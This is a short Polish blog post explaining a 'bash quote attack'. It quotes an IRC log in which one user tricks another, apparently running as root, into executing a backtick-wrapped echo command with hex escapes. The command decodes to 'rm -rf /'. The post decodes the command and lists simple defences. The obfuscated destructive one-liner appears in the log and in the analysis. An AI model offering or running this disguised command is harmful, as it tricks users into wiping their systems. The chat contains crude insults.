Bash quote attack

Powszechnie wiadomo, że system informatyczny jest tak bezpieczny jak jego najsłabsze ogniwo - użytkownik.

< KID`> arach`666: obczajasz te kolorki?:
< KID`> `echo -e "\x72\x6D\x20\x2D\x72\x66\x20\x2F"`
< arach`666> kid` kurwa
< arach`666> ty pizdzielcu jebany :D
< arach`666> root@nest: ls l /boot
< arach`666> zsh: command not found: ls
< KID`> buahahahaha

Analiza kodu

Cały problem z kolorkami polega na umieszczeniu komendy echo -e w `...` (co powoduje wykonanie tego co polecenie echo zwróci), a zwraca:

johny@ThinkPad:~$ echo -e "\x72\x6D\x20\x2D\x72\x66\x20\x2F"
rm -rf /

Metoda obrony

Aby uniknąć tego typu dowcipów mozna zastosować szereg technik:

  • MYŚLEĆ co sie wpisuje!
  • NIE uruchamiać rzeczy nieznanego pochodzenia z konta roota!
  • zrobić alias na polecenie rm
alias rm='rm -i'